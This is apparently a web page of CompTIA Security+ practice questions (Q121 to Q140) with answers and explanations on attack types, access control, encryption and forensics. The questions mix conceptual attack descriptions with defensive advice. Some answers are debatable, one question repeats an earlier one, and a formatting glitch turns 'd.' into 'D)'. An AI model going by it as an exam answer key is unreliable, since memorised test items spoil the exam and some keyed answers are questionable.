CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set 7 Q121-140

Visit here for our full CompTIA SY0-701 Security+ exam dumps and practice test questions.

Q121. A security administrator notices multiple failed login attempts from a single user account originating from different geographic locations within a few minutes. Which type of attack is most likely occurring?

A)  Brute-force attack
B)  Credential stuffing
C)  Man-in-the-middle attack
D)  Phishing

Answer: B)  Credential stuffing

Explanation:

A) Brute-force attack is a method where an attacker systematically attempts every possible password combination against a single account until the correct password is discovereD)  This approach is typically slow and resource-intensive because of the sheer number of possible combinations, especially if password complexity is high. Brute-force attacks usually target a single account rather than multiple accounts and may trigger account lockout mechanisms if the system is properly configureD)  In this scenario, the rapid login attempts from multiple geographic locations do not align with the characteristics of a traditional brute-force attack, as brute-force would not normally occur simultaneously across multiple regions unless a sophisticated botnet was involveD) 

B)  Credential stuffing is correct. Credential stuffing attacks exploit previously leaked or stolen username-password pairs. Attackers automate login attempts across many accounts using these credentials, relying on the fact that users frequently reuse passwords across different systems. The key indicators of credential stuffing include multiple failed logins in a short timeframe, attempts from varied geographic IP addresses, and automated login scripts that can bypass manual observation. The rapid succession of failed login attempts for the same account from different locations strongly indicates the use of automated tools for credential stuffing. Unlike brute-force, which guesses passwords, credential stuffing uses known credentials to gain access, making it more effective against reused passwords. Detection and mitigation strategies include implementing multi-factor authentication (MFA), monitoring unusual login locations, rate limiting, IP blacklisting, and educating users on password hygiene to prevent reuse across platforms.

C)  Man-in-the-middle (MITM) attack occurs when an attacker intercepts and possibly alters communication between two parties without their knowledge. MITM attacks can capture credentials or manipulate traffic, but they do not manifest as repeated login attempts from multiple locations. MITM would involve interception or eavesdropping rather than automated testing of stolen credentials, making it unlikely in this scenario.

D)  Phishing involves tricking users into providing credentials through deceptive emails, websites, or messages. While phishing often leads to compromised accounts that may be targeted in credential stuffing, phishing alone does not produce the behavior described in the scenario. Multiple login attempts from diverse geographic locations are indicative of an automated attack using already stolen credentials, not the initial credential capture phase that phishing represents.

Credential stuffing attacks are especially dangerous because they exploit human behavior (password reuse) rather than technical vulnerabilities, meaning even highly secured systems can be compromised if users reuse credentials across platforms. Security controls like MFA, anomaly detection, and strong password policies are essential to mitigate this threat. Additionally, monitoring authentication logs for unusual login patterns, failed login spikes, and geographic anomalies can provide early warning of credential stuffing campaigns. Organizations should also participate in breach intelligence sharing to identify potentially compromised credentials and proactively enforce password resets for affected accounts.

Q122. A company wants to enforce that users can access cloud resources only from devices that meet specific security requirements, such as being managed, patched, and compliant with antivirus policies. Which type of access control model should be implemented?

A)  Role-based access control
B)  Attribute-based access control
C)  Mandatory access control
D)  Discretionary access control

Answer: B)  Attribute-based access control

Explanation:

A) Role-based access control (RBAC) grants access permissions based on the role assigned to a user within the organization. Roles are predefined and provide a convenient way to manage large numbers of users. However, RBAC does not inherently evaluate dynamic or contextual attributes such as device compliance, security posture, or environmental conditions. It grants permissions solely based on organizational roles, making it insufficient for scenarios that require conditional access based on device health or real-time security assessments.

B)  Attribute-based access control (ABAC) is correct. ABAC evaluates access requests based on multiple attributes, which can include user identity, role, device health, location, time of day, and risk level. In this scenario, ABAC enables the organization to enforce that only managed, patched, and antivirus-compliant devices can access cloud resources. ABAC provides fine-grained and dynamic access control by combining policy rules with contextual information. The implementation often integrates with identity providers, endpoint management solutions, and compliance checks to ensure that access decisions are made in real-time. ABAC is a key component of zero-trust security models, as it enforces strict access controls even for authenticated users and allows for continuous evaluation of security posture.

C) Mandatory access control (MAC) enforces access policies based on data classification levels and security labels assigned by a central authority. MAC is highly rigid and does not consider dynamic device attributes or real-time context. While MAC ensures data confidentiality through strict hierarchical rules, it lacks the flexibility to evaluate security posture or compliance requirements for endpoints, making it unsuitable for enforcing device-specific access policies in cloud environments.

D) Discretionary access control (DAC) allows users to grant or revoke access to resources they own. This model relies on user discretion and does not provide centralized enforcement of policy rules or device-based access constraints. DAC lacks the capability to dynamically assess attributes such as device compliance or security posture, making it ineffective for enforcing conditional cloud access policies.

ABAC is increasingly critical in modern enterprise environments, especially for organizations implementing zero-trust frameworks or requiring adaptive access controls based on endpoint security. It allows security teams to define flexible policies that evaluate multiple attributes simultaneously, reduce attack surfaces, and prevent unauthorized access, even from legitimate users on non-compliant devices. ABAC policies can integrate with cloud platforms, mobile device management (MDM), and endpoint detection tools to automate enforcement, continuously monitor compliance, and adapt to emerging threats.

Q123. During a penetration test, an analyst discovers a web application that allows users to submit input that is executed by the underlying operating system without validation. What type of attack can exploit this vulnerability?

A)  Cross-site scripting
B)  SQL injection
C)  Command injection
D)  Path traversal

Answer: C)  Command injection

Explanation:

A) Cross-site scripting (XSS) attacks target the users of a web application by injecting malicious scripts that execute in the victim’s browser. XSS exploits the client side rather than the server side and does not allow attackers to execute operating system commands directly. It is primarily used to steal session cookies, perform phishing attacks, or manipulate the content viewed by users. The scenario describes execution at the OS level, making XSS an incorrect option.

B) SQL injection occurs when unvalidated input manipulates SQL queries executed against a database. SQL injection can lead to unauthorized data access, modification, or deletion but does not directly execute commands on the underlying operating system. While potentially severe, SQL injection is specific to database operations and is therefore not the attack type described here.

C)  Command injection is correct. Command injection vulnerabilities allow attackers to execute arbitrary operating system commands via unsanitized input fields. Exploitation occurs when input is passed to shell commands without proper validation, escaping, or parameterization. This can result in full system compromise, privilege escalation, installation of backdoors, or access to sensitive datA)  Command injection attacks are particularly dangerous because they bypass application logic and interact directly with the operating system, providing attackers the ability to manipulate files, processes, or network configurations. Mitigation involves strict input validation, use of safe APIs, principle of least privilege, and containment strategies to prevent execution of arbitrary commands.

D)  Path traversal involves manipulating file paths to access files outside the intended directory structure. While path traversal can lead to unauthorized file access, it does not allow execution of OS-level commands, making it unsuitable for this scenario.

Command injection remains one of the most critical web application vulnerabilities due to the potential for complete system compromise. Secure coding practices, continuous vulnerability scanning, and rigorous input validation are necessary to prevent this type of attack. In modern cloud environments, application sandboxing, containerization, and strict privilege separation further mitigate the risks posed by command injection vulnerabilities.

Q124. A company requires employees to authenticate to cloud applications using a password and a one-time code generated on a mobile device. What type of authentication is being used?

A)  Single-factor authentication
B)  Two-factor authentication
C)  Biometric authentication
D)  Certificate-based authentication

Answer: B)  Two-factor authentication

Explanation:

A)  Single-factor authentication uses only one type of credential, such as a passworD)  While common, it is susceptible to attacks like credential theft, phishing, and brute-force because it relies on a single proof of identity. Single-factor authentication does not meet modern security requirements for protecting sensitive cloud resources.

B) Two-factor authentication (2FA) is correct. In this scenario, the password represents “something you know” and the one-time code generated on a mobile device represents “something you have.” Two independent factors provide significantly stronger security because compromising one factor (e.g., the password) is insufficient to gain access without the second factor. 2FA mitigates risks from stolen credentials, phishing, or automated attacks. It is widely implemented in cloud services, financial applications, and corporate systems to enhance security and comply with regulatory standards. Proper deployment requires secure OTP generation, robust delivery mechanisms, and fallback processes in case of device loss or failure.

C)  Biometric authentication relies on physical characteristics, such as fingerprints or facial recognition, which are not being used in this scenario. While biometrics can provide an additional factor, it is not relevant to the scenario describeD) 

D)  Certificate-based authentication uses digital certificates and cryptographic keys to verify identity. While highly secure, this scenario does not involve certificates; it relies on passwords and one-time codes.

Implementing two-factor authentication significantly strengthens the security posture of organizations by requiring attackers to compromise multiple independent factors, reducing the risk of unauthorized access even in the presence of stolen or weak passwords. Organizations should combine 2FA with user education, risk-based adaptive authentication, and monitoring to maximize protection.

Q125. A security audit finds that multiple employees are sharing credentials to access critical systems, making it impossible to track who performed specific actions. Which security principle is being violated?

A)  Accountability
B)  Separation of duties
C)  Least privilege
D)  Role rotation

Answer: A)  Accountability

Explanation:

A) Accountability is correct. Accountability ensures that every action performed within a system can be traced to a unique individual. When users share credentials, it becomes impossible to determine which user executed a particular operation, undermining audit trails, forensic investigations, and compliance with standards such as SOX, PCI DSS, and HIPAA)  Maintaining unique, individual credentials ensures traceability and deters misuse or frauD)  Implementing audit logging, monitoring, and user-specific authentication enforces accountability.

B)  Separation of duties distributes responsibilities among multiple individuals to reduce fraud and error but does not directly address credential sharing. Although separation of duties can mitigate risk from misuse, the immediate violation in this scenario is the inability to attribute actions to a specific user.

C)  Least privilege limits user access to only what is necessary for their joB)  Credential sharing may bypass least privilege controls, but the principle being violated is primarily accountability, not access control.

D) Role rotation periodically shifts responsibilities among users to detect irregularities or prevent insider threats. While helpful for security governance, it does not address the direct issue of shared credentials and inability to track actions.

Credential sharing poses significant risks, including insider threats, lack of traceability, and regulatory non-compliance. Enforcement of unique user credentials, strong authentication mechanisms, and regular audits are essential to uphold accountability. Security policies, awareness programs, and technical controls such as single sign-on (SSO) with individualized credentials support proper enforcement.

Q126. A security team detects a sudden spike in network traffic aimed at a critical web server, causing the server to become unresponsive. Which type of attack is most likely occurring?

A)  Distributed denial-of-service attack
B)  Phishing
C)  SQL injection
D)  Man-in-the-middle attack

Answer: A)  Distributed denial-of-service attack

Explanation:

A)  Distributed denial-of-service (DDoS) attack is correct. A DDoS attack occurs when multiple compromised systems, often part of a botnet, flood a target server, application, or network with excessive traffic, overwhelming its resources and causing legitimate users to be denied service. Key indicators of a DDoS include: sudden spikes in traffic from multiple geographic locations or IP addresses, unusual types of network requests, and degradation or complete loss of service. DDoS attacks can target the network layer (e.g., SYN floods), transport layer (e.g., UDP floods), or application layer (e.g., HTTP floods). These attacks can be extremely damaging to businesses, causing financial losses, reputational damage, and operational disruptions. Mitigation strategies involve deploying DDoS protection services, traffic filtering, rate limiting, and using content delivery networks (CDNs) to absorb traffiC)  Continuous monitoring and traffic anomaly detection are also crucial.

B)  Phishing is a social engineering attack designed to trick individuals into providing credentials or other sensitive information. While phishing can be used to gain access to systems or launch further attacks, it does not directly overwhelm network resources or cause servers to become unresponsive. Phishing campaigns typically target users via email, messaging platforms, or websites, not infrastructure traffic, making this option incorrect in the context of a sudden traffic spike.

C)  SQL injection is a web application attack that manipulates backend SQL queries through unsanitized input. While severe, SQL injection generally affects databases and data integrity rather than causing a direct flood of network traffiC)  It could be used to exfiltrate or manipulate data but does not match the described scenario of server unresponsiveness due to traffic volume.

D)  Man-in-the-middle (MITM) attack occurs when an attacker intercepts communication between two parties. MITM can capture credentials, modify messages, or inject malicious content, but it does not create a high volume of traffic targeting a server to make it unavailable. MITM focuses on stealthy interception rather than causing resource exhaustion, so it does not fit this scenario.

DDoS attacks are increasingly used for extortion, political motives, or competitive disruption. Organizations employ layered defenses including network traffic monitoring, anomaly detection, and automated mitigation mechanisms to ensure availability of critical services during attacks. Advanced DDoS attacks may combine volumetric, protocol, and application-layer methods, making proactive threat intelligence and adaptive mitigation crucial for resilience.

Q127. A penetration tester finds that a web application accepts user input that is used directly in database queries without proper validation. Which attack can exploit this vulnerability?

A)  Cross-site scripting
B)  SQL injection
C)  Command injection
D)  Path traversal

Answer: B)  SQL injection

Explanation:

A)  Cross-site scripting (XSS) targets end-users by injecting scripts into web pages viewed by others. It affects the client-side and does not allow attackers to manipulate database queries directly. XSS can lead to cookie theft, session hijacking, or content manipulation but does not compromise server-side database operations, making it inappropriate for this scenario.

B)  SQL injection is correct. SQL injection exploits vulnerabilities in web applications where user input is embedded into SQL statements without proper validation or sanitization. Attackers can manipulate these queries to exfiltrate data, modify or delete database records, bypass authentication mechanisms, or execute administrative operations. Indicators include unexpected application behavior, error messages revealing database structure, or abnormal query patterns observed in logs. Prevention strategies include using parameterized queries or prepared statements, input validation, least-privilege database accounts, and regular vulnerability assessments. SQL injection is a critical threat due to its high impact on data confidentiality, integrity, and availability.

C) Command injection targets operating system commands rather than database queries. While dangerous, command injection exploits occur when input is executed directly in the system shell, not in SQL statements. The scenario specifically involves database query manipulation, so command injection is incorrect here.

D)  Path traversal allows unauthorized access to files outside intended directories. While serious, path traversal attacks do not manipulate database queries and are unrelated to the described input vulnerability. Attackers may use it to read sensitive files, but it cannot execute SQL operations, making this option inappropriate.

SQL injection remains one of the most prevalent and dangerous web application vulnerabilities. Mitigation requires secure coding practices, rigorous input validation, use of parameterized queries, and proactive vulnerability scanning. Combining these approaches with logging and monitoring helps detect attempted attacks before significant damage occurs.

Q128. An organization wants to ensure that sensitive cloud data is encrypted in a way that the cloud provider cannot access it, and the organization maintains control of the encryption keys. Which encryption model does this describe?

A)  Provider-managed encryption
B)  Customer-managed encryption with provider key storage
C)  Customer-managed encryption with customer key storage
D)  Provider-managed encryption with customer key storage

Answer: C)  Customer-managed encryption with customer key storage

Explanation:

A) Provider-managed encryption relies entirely on the cloud provider to generate, store, and manage encryption keys. While it encrypts data at rest, the provider retains the ability to decrypt data and may be compelled by legal or government orders. This does not provide exclusive control to the organization and is unsuitable for scenarios requiring full confidentiality from the provider.

B) Customer-managed encryption with provider key storage allows the organization to manage encryption policies, but the keys reside in the provider’s infrastructure. This reduces risk compared to provider-managed encryption but still grants the provider potential access. If compliance or legal requirements demand that the provider cannot decrypt data, this model is insufficient.

C)  Customer-managed encryption with customer key storage is correct. In this model, the organization generates, stores, and manages encryption keys independently, often using hardware security modules (HSMs) or secure key vaults. The cloud provider can store encrypted data but cannot decrypt it without the organization’s keys. This provides strong confidentiality, ensures compliance with strict regulatory requirements (e.g., HIPAA, GDPR, financial regulations), and reduces risk of provider-side compromise. Implementation requires robust key lifecycle management, including generation, rotation, revocation, and secure backup. Organizations must also prepare for disaster recovery and key loss scenarios to prevent permanent data loss.

D)  Provider-managed encryption with customer key storage is not a practical or supported model, as providers cannot manage keys fully controlled and stored by customers. This combination would be inconsistent with operational feasibility.

Customer-managed encryption with customer key storage provides maximum control and ensures cryptographic autonomy, balancing cloud convenience with stringent data confidentiality requirements. Organizations should also combine this with access controls, auditing, and monitoring to ensure secure key usage and compliance.

Q129. A security analyst observes that attackers are using stolen usernames and passwords from a previous breach to attempt automated logins across multiple internal systems. Which attack is occurring?

A)  Brute-force attack
B)  Credential stuffing
C)  Password spraying
D)  Keylogging

Answer: B)  Credential stuffing

Explanation:

A) Brute-force attacks systematically attempt all possible password combinations for a single account. Brute-force is usually slow and resource-intensive and does not rely on previously exposed credentials. While effective in some scenarios, it does not fit the description of using known stolen credentials across multiple accounts.

B)  Credential stuffing is correct. Credential stuffing exploits password reuse from previous breaches. Attackers automate login attempts using large volumes of leaked username-password pairs. Indicators include login attempts from multiple IP addresses, rapid automated access attempts across many accounts, and use of previously exposed credentials. Mitigation strategies include enforcing multi-factor authentication (MFA), monitoring unusual login activity, educating users on password hygiene, and ensuring unique passwords per system. Unlike password spraying, which targets weak passwords across accounts, credential stuffing relies on already known credentials, making it highly effective against organizations with password reuse issues.

C)  Password spraying attempts a small set of common passwords across multiple accounts without using known credentials. While related to brute-force, it does not exploit credentials obtained from breaches. This attack is less targeted than credential stuffing.

D) Keylogging is a malware-based method for capturing user input, such as usernames and passwords. It is unrelated to automated login attempts using leaked credentials, so it does not match the scenario describeD) 

Credential stuffing attacks exploit human behavior (password reuse) rather than technical vulnerabilities. Strong authentication, proactive monitoring, and user education are critical for mitigating this growing threat. Organizations should also leverage threat intelligence and breached credential monitoring to respond rapidly.

Q130. A penetration tester discovers that a Linux server has a root-owned cron job that executes a script every few minutes. The script is writable by all users. Which attack is most likely possible?

A)  Privilege escalation
B)  Lateral movement
C)  Credential harvesting
D)  Pivoting

Answer: A)  Privilege escalation

Explanation:

A)  Privilege escalation is correct. In this scenario, the cron job runs with root privileges, but the script is writable by all users. An attacker or tester can modify the script to include malicious commands that will execute with root permissions the next time the cron job runs. This allows an unprivileged user to gain full administrative access to the system. Privilege escalation is a common consequence of misconfigured cron jobs, improper file permissions, or insecure service configurations. Once root access is gained, attackers can establish persistence, install backdoors, or further compromise the system. Mitigation includes enforcing strict file permissions, applying the principle of least privilege, monitoring cron jobs, and performing regular security audits.

B) Lateral movement occurs after initial compromise, where attackers move to other systems on the network to escalate access or gather more information. While privilege escalation may facilitate lateral movement, it is not the immediate vulnerability in this scenario.

C)  Credential harvesting involves capturing passwords or tokens from memory, files, or input devices. While an attacker with root access may perform credential harvesting later, the described vulnerability allows privilege escalation rather than direct credential capture.

D)  Pivoting is using a compromised host as a platform to attack other systems. Privilege escalation may enable pivoting, but the immediate vulnerability is gaining root access through the writable cron joB) 

Misconfigured cron jobs are a critical risk in Linux environments. Security best practices include limiting file permissions, ensuring proper ownership, and auditing scheduled tasks to prevent unauthorized privilege escalation. Monitoring logs and employing file integrity monitoring tools can help detect malicious changes.

Q131. A company wants to enforce strict access control in its network so that users can only perform actions they are explicitly permitted to, and no one can override the access policies. Which access control model should be implemented?

A)  Discretionary access control
B)  Role-based access control
C)  Mandatory access control
D)  Attribute-based access control

Answer: C)  Mandatory access control

Explanation:

A)  Discretionary access control (DAC) allows resource owners to grant or revoke access to objects at their discretion. While DAC is flexible, it does not provide strict enforcement by a central authority. Users can potentially share permissions or override security policies, which makes it unsuitable for environments that require rigid control and regulatory compliance.

B) Role-based access control (RBAC) assigns permissions based on user roles within the organization. While RBAC simplifies management and reduces errors compared to DAC, it lacks the centralized enforcement and strict labeling that some highly secure environments require. RBAC does not inherently prevent a user from granting their own access to others if misconfigured, so it is less secure than mandatory approaches for highly sensitive environments.

C) Mandatory access control (MAC) is correct. MAC enforces access policies dictated by a central authority rather than the data owner. Objects and subjects are labeled with sensitivity levels (e.g., Confidential, Secret, Top Secret), and access decisions are based on these labels and a set of security rules. MAC is often used in government, military, and critical infrastructure contexts where compliance and strict data separation are mandatory. Key characteristics include:

Centralized policy enforcement: Users cannot modify access policies themselves.

 

Label-based security: Files, systems, and network resources are tagged with classification labels.

 

Rule-driven access: Access decisions are made based on matching user clearance with object sensitivity.

 

High assurance of confidentiality and integrity: Prevents accidental or intentional unauthorized access.

 

D)  Attribute-based access control (ABAC) grants access based on attributes such as user identity, device security posture, time, and location. ABAC is highly flexible and dynamic but requires complex policy management and infrastructure. While ABAC can enforce granular control, MAC provides stricter, non-overridable enforcement, which aligns with the requirements in this scenario.

MAC is ideal for environments where strict security is required, such as defense, intelligence, and highly regulated industries. Organizations implementing MAC often combine it with auditing, encryption, and monitoring to ensure compliance and prevent data leakage.

Q132. A security analyst observes an internal user attempting to access files they do not normally use, repeatedly accessing sensitive directories outside of their department, and transferring data to an external USB device. Which type of threat is being observed?

A)  Insider threat
B)  Advanced persistent threat
C)  Credential stuffing
D)  Phishing

Answer: A)  Insider threat

Explanation:

A)  Insider threat is correct. Insider threats occur when a legitimate user within the organization intentionally or unintentionally engages in malicious activity or data misuse. In this scenario, the behavior includes unusual file access, attempts to access restricted directories, and data exfiltration to an external device. Key aspects of insider threats include:

Access misuse: Authorized users exploit legitimate access privileges to view, copy, or modify sensitive datA)

 

Data exfiltration: Removing confidential data from the network, often via removable media or unauthorized transfers.

 

Behavior anomalies: Patterns of access inconsistent with normal job duties.

 

Potential sabotage: Altering or deleting critical files to disrupt operations.

 

Mitigation strategies include:

User activity monitoring (UAM) and auditing.

 

Role-based access control with least privilege enforcement.

 

Data loss prevention (DLP) solutions to restrict sensitive data transfers.

 

Employee awareness programs and whistleblower channels.

 

B)  Advanced persistent threat (APT) is usually external in origin, involving sophisticated, long-term cyber campaigns targeting organizations for espionage or intellectual property theft. While APTs may use insider help, this scenario specifically describes suspicious internal user behavior.

C)  Credential stuffing involves automated login attempts using previously leaked credentials. It targets account compromise, not malicious activity by an authenticated insider.

D)  Phishing targets users externally to steal credentials or install malware. While phishing can facilitate insider threats indirectly, it does not describe the internal behavior observed here.

Insider threats are among the most challenging to detect and mitigate because the attacker already has legitimate access. Continuous monitoring, behavioral analytics, strict access controls, and security awareness programs are critical to minimizing the risk of data breaches and operational sabotage.

Q133. During a penetration test, the tester finds that a web application stores session tokens in URLs instead of cookies. Which security vulnerability does this represent, and why is it critical?

A)  Cross-site scripting
B)  Session hijacking
C)  SQL injection
D)  Man-in-the-middle attack

Answer: B)  Session hijacking

Explanation:

A) Cross-site scripting (XSS) involves injecting malicious scripts into a website, affecting client-side users. While XSS can be used to steal session tokens, the scenario specifically describes insecure storage of session identifiers, not malicious script execution.

B) Session hijacking is correct. Session hijacking occurs when attackers capture or guess valid session identifiers to impersonate a user. Storing session tokens in URLs is insecure because:

URLs are often logged in browser history, server logs, and proxies.

 

Tokens in URLs can be exposed to third-party analytics or shared inadvertently.

 

Attackers can easily intercept tokens via social engineering or network monitoring.

 

Exploiting this vulnerability allows an attacker to gain unauthorized access to active sessions, bypassing authentication. Prevention measures include using secure cookies with HttpOnly and Secure flags, regenerating session identifiers after login, setting appropriate expiration times, and avoiding token storage in URLs.

C)  SQL injection targets database queries via unsanitized input. While critical, it does not relate to session token management or URL storage, so it is not applicable here.

D) Man-in-the-middle (MITM) attack intercepts communications between parties. While MITM could exploit insecure session tokens during transmission, the vulnerability in this case is about storage in URLs, not the interception mechanism.

Session hijacking via insecure URL storage is a high-impact vulnerability, enabling attackers to take over user accounts, access sensitive data, and perform unauthorized transactions. Secure session management practices are essential for protecting web applications and user datA) 

Q134. A financial institution wants to ensure that all transactions are logged in a way that cannot be modified, even by administrators. Which security property is the organization enforcing?

A)  Redundancy
B)  Non-repudiation
C)  Immutability
D)  Elasticity

Answer: C)  Immutability

Explanation:

A) Redundancy improves system availability by duplicating systems, storage, or services. While it ensures accessibility, redundancy does not prevent modification of records or logs, so it does not address the requirement for tamper-proof transaction logs.

B)  Non-repudiation ensures that a party cannot deny having performed an action. While related to accountability, non-repudiation does not guarantee that logs themselves cannot be altered after creation. It primarily involves cryptographic verification of actions.

C)  Immutability is correct. Immutability ensures that once data is written, it cannot be modified or deleteD)  For financial transactions, immutable logs:

Provide a tamper-proof audit trail for regulatory compliance.

 

Support forensic investigations and accountability.

 

Can be implemented using write-once-read-many (WORM) storage, blockchain-based ledgers, or append-only logging mechanisms.

 

By enforcing immutability, the organization ensures trustworthiness of records even if administrators or attackers attempt to alter them. Best practices include using cryptographic hashing to verify log integrity, segregating logging systems, and maintaining regular backups.

D)  Elasticity refers to the ability of systems to scale resources up or down on demand, which is unrelated to protecting the integrity or unalterability of logs.

Immutability is essential for high-integrity environments such as finance, healthcare, and critical infrastructure. It protects against both accidental and intentional tampering, providing auditable, reliable records for compliance and dispute resolution.

Q135. A company detects unusual login patterns where multiple accounts are being accessed from the same IP address outside of normal working hours. Which type of detection mechanism would best identify this activity?

A)  Signature-based intrusion detection system
B)  Behavior-based analytics
C)  Static firewall
D)  Packet filtering

Answer: B)  Behavior-based analytics

Explanation:

A)  Signature-based intrusion detection systems rely on known attack patterns or signatures to detect threats. They are effective for identifying known attacks but cannot detect deviations from normal user behavior, such as unusual login times, making them unsuitable for this scenario.

B)  Behavior-based analytics is correct. Behavior-based or anomaly detection systems establish baselines for normal user, device, and application activity. Deviations such as logins from unusual IP addresses, unusual times, or abnormal resource access trigger alerts. Key features include:

Baseline modeling: Understanding typical login times, geolocations, and system usage.

 

Anomaly detection: Identifying outliers that may indicate insider threats or compromised accounts.

 

Machine learning integration: Statistical or ML models help reduce false positives and improve detection accuracy.

 

Real-time alerts: Allowing security operations teams to respond quickly to potential threats.

 

C)  Static firewalls enforce predefined rules for network traffic but do not monitor user behavior or detect anomalies. While important for perimeter defense, firewalls cannot identify unusual login patterns.

D)  Packet filtering inspects network traffic headers to allow or block packets based on rules. It does not analyze user behavior, login patterns, or temporal anomalies, so it cannot detect this type of suspicious activity.

Behavior-based analytics is particularly valuable in detecting insider threats, compromised credentials, and early stages of attacks. Organizations in finance, healthcare, and critical infrastructure rely on behavior-based monitoring to supplement traditional defenses and proactively identify threats.

Q136. During a security audit, an organization finds that several users have been using the same administrative credentials across multiple systems. Which security principle is being violated, and what risks does this pose?

A)  Accountability
B)  Least privilege
C)  Separation of duties
D)  Role rotation

Answer: A)  Accountability

Explanation:

A)  Accountability is correct. Accountability ensures that all actions performed in a system can be traced to a specific individual. By sharing administrative credentials, users undermine this principle because it becomes impossible to determine who executed a particular action. This has several risks:

Audit failures: Regulatory standards such as PCI DSS, SOX, and HIPAA require clear traceability of user actions. Shared credentials violate these requirements.

 

Malicious activity masking: If a breach occurs or data is manipulated, investigation becomes challenging because multiple users could be responsible.

 

Internal threat escalation: Insider threats are harder to detect if multiple people use the same credentials, increasing risk of sabotage or unauthorized access.

 

Lack of forensic reliability: Forensic investigations depend on unique user identification. Credential sharing invalidates chain-of-custody evidence.

 

B)  Least privilege restricts user access to the minimum necessary for their joB)  While shared administrative credentials could bypass least privilege controls, the primary principle being violated is accountability, not privilege limitation.

C)  Separation of duties divides responsibilities to prevent fraud or errors. While shared credentials could impact separation of duties, the scenario focuses on traceability, which is directly related to accountability.

D)  Role rotation involves periodically changing duties to reduce insider threat risks. Credential sharing does not directly relate to rotating roles.

To mitigate accountability risks, organizations should enforce unique credentials for every user, implement multi-factor authentication, and maintain detailed audit logs. Privileged access management (PAM) tools can help ensure that administrative accounts are used securely and that actions are attributable to a specific user.

Q137. A web application is found to accept unvalidated input in search fields, which allows attackers to inject scripts that execute in other users’ browsers. Which type of vulnerability is this, and what are the implications?

A)  SQL injection
B)  Cross-site scripting
C)  Command injection
D)  Path traversal

Answer: B)  Cross-site scripting

Explanation:

A) SQL injection occurs when attackers manipulate SQL queries to access or modify databases. While highly dangerous, SQL injection does not target the client-side browser directly, so it is not relevant to this scenario.

B) Cross-site scripting (XSS) is correct. XSS vulnerabilities arise when user-supplied input is not properly sanitized and is rendered on web pages viewed by other users. Attackers can inject malicious scripts to:

Steal session cookies or tokens, enabling account hijacking.

 

Redirect users to phishing sites.

 

Execute malicious actions in the context of a logged-in user, potentially causing data leakage.

 

Deliver malware to users’ browsers.

 

XSS can be categorized into three main types:

Stored XSS: Malicious input is saved on the server and served to all users accessing the affected page.

 

Reflected XSS: Malicious input is reflected immediately in the server response, typically through URLs or form inputs.

 

DOM-based XSS: Vulnerabilities exist in client-side code manipulation of the Document Object Model.

 

Mitigation involves proper input validation, output encoding, use of security headers like Content Security Policy (CSP), and avoiding unsafe HTML rendering of user input.

C)  Command injection allows attackers to execute OS commands on the server. While dangerous, this scenario describes attacks targeting client-side browsers, not server-level command execution.

D) Path traversal exploits insecure file path handling to access files outside intended directories. This vulnerability does not involve executing scripts in other users’ browsers.

XSS vulnerabilities are critical because they exploit trust between users and web applications. Organizations must perform secure coding practices, input sanitization, and regular penetration testing to prevent XSS attacks.

Q138. A company wants to restrict access to cloud resources based on device compliance, location, and time of access. Which access control model supports this level of granularity and dynamic enforcement?

A)  Discretionary access control
B)  Role-based access control
C)  Attribute-based access control
D)  Mandatory access control

Answer: C)  Attribute-based access control

Explanation:

A) Discretionary access control (DAC) allows owners to assign access at their discretion. While flexible, DAC cannot enforce dynamic, context-aware policies like device compliance or location, making it unsuitable for cloud security.

B) Role-based access control (RBAC) grants permissions based on user roles. While RBAC simplifies management and ensures that users have only role-appropriate access, it cannot dynamically evaluate context such as device health, geolocation, or time of access.

C)  Attribute-based access control (ABAC) is correct. ABAC enforces access policies based on multiple attributes associated with users, devices, and environmental conditions. In a cloud environment, ABAC enables:

Conditional access: Users can access resources only if certain conditions (device compliance, location, time) are met.

 

Dynamic policy enforcement: Access is evaluated in real time, reducing the risk of unauthorized access.

 

Fine-grained control: Policies can consider combinations of attributes, supporting complex security requirements.

 

Integration with zero-trust frameworks: ABAC aligns with zero-trust principles by continuously evaluating trust before granting access.

 

D) Mandatory access control (MAC) enforces strict, label-based policies determined by a central authority. While highly secure, MAC is static and does not evaluate dynamic contextual attributes like device compliance or time-based conditions.

ABAC is widely used in modern cloud and enterprise environments to balance flexibility and security. By implementing ABAC, organizations can reduce unauthorized access risks, enforce compliance, and maintain granular control over sensitive resources.

Q139. During a forensic investigation, an analyst wants to ensure that collected evidence has not been altereD)  Which method provides the highest assurance of integrity?

A)  Disk partitioning
B)  Hashing
C)  Defragmentation
D)  Sanitization

Answer: B)  Hashing

Explanation:

A)  Disk partitioning involves modifying the structure of storage media to create partitions. This alters the disk and does not provide integrity verification.

B)  Hashing is correct. Hashing generates a unique cryptographic fingerprint of digital evidence. Any modification to the data changes the hash value, allowing the analyst to verify integrity. Important aspects include:

Cryptographic hash functions: SHA-256 or SHA-3 generate fixed-length outputs that change if even a single bit is altereD)

 

Chain of custody: Hashing supports legal admissibility by proving evidence has not been tampered with.

 

Verification: Comparing hashes of original and copied evidence ensures authenticity.

 

Best practices: Analysts document hash values, hash both originals and copies, and include them in forensic logs.

 

C) Defragmentation reorganizes files on a disk, modifying data layout. This would invalidate forensic integrity, so it is inappropriate for evidence verification.

D)  Sanitization destroys or irreversibly modifies data to prevent recovery. This contradicts forensic goals of preserving evidence and is not suitable for integrity verification.

Hashing is essential in digital forensics, ensuring trust in evidence and supporting prosecutorial requirements in legal proceedings. It is a cornerstone of forensic methodology for verifying integrity.

Q140. A penetration tester finds a Linux server where a root-owned cron job executes a script that is writable by all users. Which type of attack could be performed next?

A)  Privilege escalation
B)  Lateral movement
C)  Credential harvesting
D)  Pivoting

Answer: A)  Privilege escalation

Explanation:

A)  Privilege escalation is correct. Writable root-owned scripts executed by cron jobs represent a critical vulnerability. Steps for exploitation include:

Modifying the script to execute commands with root privileges.

 

Waiting for cron to execute the script, thereby gaining elevated privileges.

 

Using root access to secure persistence, extract data, or launch additional attacks.

 

This scenario demonstrates a classic misconfiguration vulnerability caused by improper file permissions. Privilege escalation allows attackers to gain administrative control of the system, which can compromise the entire network if not mitigateD) 

B)  Lateral movement occurs after gaining access to one system to exploit others in the network. While privilege escalation can facilitate lateral movement, the immediate risk is gaining elevated privileges locally.

C)  Credential harvesting targets stored passwords or tokens. While root access could enable credential harvesting later, the primary vulnerability here is misconfigured cron permissions.

D)  Pivoting involves using a compromised host to launch attacks on other systems. Pivoting is a subsequent step and depends on first achieving privilege escalation.

Mitigation includes proper file permissions, least privilege enforcement, regular configuration audits, and monitoring of scheduled tasks. Security policies should prevent world-writable scripts from being executed by elevated accounts to avoid privilege escalation vulnerabilities.